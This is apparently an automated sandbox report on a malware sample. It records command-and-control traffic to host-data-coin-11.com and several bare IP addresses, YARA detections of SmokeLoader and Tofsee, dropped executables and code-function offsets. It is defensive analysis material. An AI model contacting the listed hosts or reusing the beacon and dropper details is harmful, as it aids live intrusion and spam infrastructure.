                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 74 5e a5 55 eb c4 66 e4 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevt^UfdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 06 0f bb 35 dc fe 66 b1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTev5fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c7 d7 10 56 3d 42 a6 fe c2 aa b9 01 ac 52 cc 77 f8 55 4d 84 4b f4 f1 2c 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OV=BRwUMK,0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d7 8c 08 04 64 1f 0d 0a 30 0d 0a 0d 0a Data Ascii: 19I:82Od0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f cf 86 52 15 62 10 e5 e8 83 a0 ad 0d 0a 30 0d 0a 0d 0a Data Ascii: 1eI:82ORb0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:33:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4c e5 ae 8e 70 bc 57 dd 43 d4 f8 21 86 24 e8 c3 96 57 2e e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9LpWC!$W.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 04 Jan 2022 18:34:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.186.142.166
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.233.81.115
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.171
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mnxwgte.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: host-data-coin-11.com
                      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49797 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.5:49841 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.15:443 -> 192.168.2.5:49842 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.5:49851 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.5:49852 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.5:49855 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.5:49856 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.5:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49864 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49866 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 87.240.190.72:443 -> 192.168.2.5:49882 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.248.232.78:443 -> 192.168.2.5:49887 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 178.248.232.78:443 -> 192.168.2.5:49889 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 116.202.14.219:443 -> 192.168.2.5:49894 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 51.91.13.105:443 -> 192.168.2.5:49895 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected SmokeLoader
                      Source: Yara matchFile source: 1.2.nkINykHreE.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.haifbcd.4715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.1.nkINykHreE.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.1.haifbcd.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.nkINykHreE.exe.5415a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.115B.exe.4715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.1.115B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.haifbcd.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.115B.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000000.282842442.0000000003A61000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.370053936.0000000000751000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.352429754.0000000002091000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.297306514.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.444174815.0000000000951000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.352266837.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.297326406.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.370019662.0000000000620000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.442728079.0000000000630000.00000004.00000001.sdmp, type: MEMORY
                      Source: 115B.exe, 0000000E.00000002.341864344.00000000006BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      Spam, unwanted Advertisements and Ransom Demands:

                      Yara detected Tofsee
                      Source: Yara matchFile source: 18.2.18D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.svchost.exe.2bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.600000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.600000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.18D.exe.540e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.3.sdiimdop.exe.570000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.18D.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.18D.exe.560000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.sdiimdop.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.svchost.exe.2bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001F.00000002.396765412.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.390911110.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000003.395236716.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.550647204.0000000002BB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.396983806.0000000000600000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.396894340.0000000000540000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.390725871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.369452134.0000000000560000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 18D.exe PID: 4992, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: sdiimdop.exe PID: 4560, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5180, type: MEMORYSTR

                      System Summary:

                      PE file has nameless sections
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 4BED.exe.3.drStatic PE information: section name:
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00436950
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00435B70
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_005431FF
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00543253
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_00402A5F
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_00402AB3
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_1_00402A5F
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_1_00402B2E
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 13_2_00473253
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 13_2_004731FF
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 14_2_00473253
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 14_2_004731FF
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 14_2_006C1004
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_00402AB3
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_1_00402A5F
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_1_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 16_2_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 16_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 16_1_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 16_1_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_004027CA
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_00401FF1
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_0040158E
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_004015A6
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_004015BC
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_00436340
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_00435560
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00435940
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00436720
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_030395F0
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_03030464
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_03030470
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_030BDC78
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_030B8C08
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_030B8C18
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_030B847B
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_05681410
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_05684FF8
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_05680040
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_05682A48
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: 31_2_0040C913
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: 31_2_00435940
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: 31_2_00436720
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: nkINykHreE.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 115B.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 115B.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 115B.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 115B.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2997.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2997.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 2757.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4187.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4187.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 13E0.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 13E0.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 1B15.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 1B15.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 1B15.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 1B15.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 28C2.exe.3.drStatic PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
                      Source: 28C2.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4583.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4BED.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4BED.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 4BED.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 18D.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 18D.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 18D.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
